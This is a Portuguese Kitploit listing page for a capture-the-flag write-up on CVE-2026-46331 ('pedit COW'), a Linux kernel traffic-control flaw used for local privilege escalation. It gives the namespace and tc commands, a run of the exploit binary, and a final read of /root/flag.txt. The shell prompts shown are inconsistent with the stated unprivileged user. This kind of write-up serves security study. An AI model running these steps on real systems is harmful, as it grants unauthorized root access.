Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-46331-pedit-cow — Análise e etapas de exploração da vulnerabilidade pedit COW (CVE-2026-46331) | Kitploit
Ferramentas/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
Escalada de PrivilégiosExploraçãoCTFAprendizado e EducaçãoExploração de Binários
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

Análise e etapas de exploração da vulnerabilidade pedit COW (CVE-2026-46331)

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
1há 2 mesesAinda não revisado

CVE-2026-46331-pedit-cow

Write-up e etapas de exploração para a vulnerabilidade pedit COW (CVE-2026-46331).

Visão Geral

Este desafio demonstra o pedit COW, uma falha do kernel Linux na ação de edição de pacotes do subsistema de controle de tráfego (act_pedit). A vulnerabilidade permite que um usuário sem privilégios sobrescreva uma cópia em memória de um binário setuid-root, obtendo efetivamente um shell root sem nunca tocar no arquivo no disco.

Etapas de Exploração

1. Configuração Inicial

O ambiente inicia como um usuário sem privilégios (karen).

root@kitploit:~
id
cd ~/packet_edit_meme
make packet_edit_meme
  1. Escalação de Privilégios (Criação de Namespace) Configurar o controle de tráfego normalmente exige privilégios CAP_NET_ADMIN, que um usuário comum não possui. Eu usei namespaces de usuário sem privilégios para obter essa capacidade.
root@kitploit:~
unshare -r -n
  1. Configurando a Ação de Controle de Tráfego Dentro do namespace, configurei o qdisc clsact e apliquei um filtro para acionar a ação pedit.

Limpe quaisquer configurações existentes se necessário

root@kitploit:~
tc qdisc del dev lo clsact

Configure o qdisc e o filtro

root@kitploit:~
tc qdisc add dev lo clsact
root@kitploit:~
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
  1. Executando o Exploit Após configurar o ambiente, saí do shell root e executei o exploit como um usuário sem privilégios.
root@kitploit:~
exit
./packet_edit_meme
  1. Resultado Final O exploit sobrescreveu com sucesso a entrada para /bin/su, fornecendo um shell root interativo.
root@kitploit:~
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

Baixar ferramenta